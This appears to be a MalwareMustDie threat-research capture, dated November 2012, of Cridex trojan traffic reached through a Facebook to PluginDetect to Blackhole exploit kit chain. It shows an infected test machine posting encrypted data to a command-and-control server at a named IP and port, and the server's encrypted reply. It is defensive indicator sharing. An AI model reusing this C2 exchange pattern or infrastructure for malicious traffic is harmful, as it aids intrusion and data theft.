===========================================
MalwareMustDie - Cridex Network analysis
Facebook --> PluginDetect 0.7.9 --> BHEK2
@unixfreaxjp - Sun, 25 Nov 2012 15:20:20 GMT
===========================================

// TestPC ---> 180.235.150.72 HTTP-POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1

POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 180.235.150.72:8080
Content-Length: 347
Connection: Keep-Alive
Cache-Control: no-cache

.....T*K..N..t...H......I:...{....X{.C..l.?su.{.N....29..%........i..Z..K....}....k.9.i|....IGJ....H..e
...',.H.%..$..Y6....t..J..j....NSpb3p...:..J.....B?..v.)....C.]c.J+.o.
..~..I&]6pf.Z....:...K....'y}EC....J.I<2.5..O..KX,u-R..k..f.i2..#KZg."
..2..G\..~5"|..B...e........A.O..N..ic4..0...I......C.....UG..m..g.vt+
/.nw,l.

HTTP/1.1 200 OK   // Receiving a long response below:
Server: nginx/1.0.10
Date: Sun, 25 Nov 2012 13:39:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding

f3b
/..PS..~:Pk1.$...|a8......$....S.yb....p......d.VR..+P....... .P*.&+.i
.d..>.....tM.c.B+..W..^.2.......X..qr.|I.zY`0N.{.O.WU...4,.9..^kK
2U...`........p..N..v...:O\dy.:.W.b."...]..Y...0.l.......m%.).=..N=..
: long one... :
zL..!..B............7..PS3..x...}.Q.s.4Ntm5K;t~p..0.....2%../*...Cd.J.
...!D..5Q8...'E>-..5.*A...B6.h..=X.z.Y......[..;-....vm.h.aN.RX.(V...!
..@a....M.@.+.ji.....C..U.S.e_...^......g?.<..-..^.xe.....`........%..
Z.2..../.
0

// #MalwareMustDie!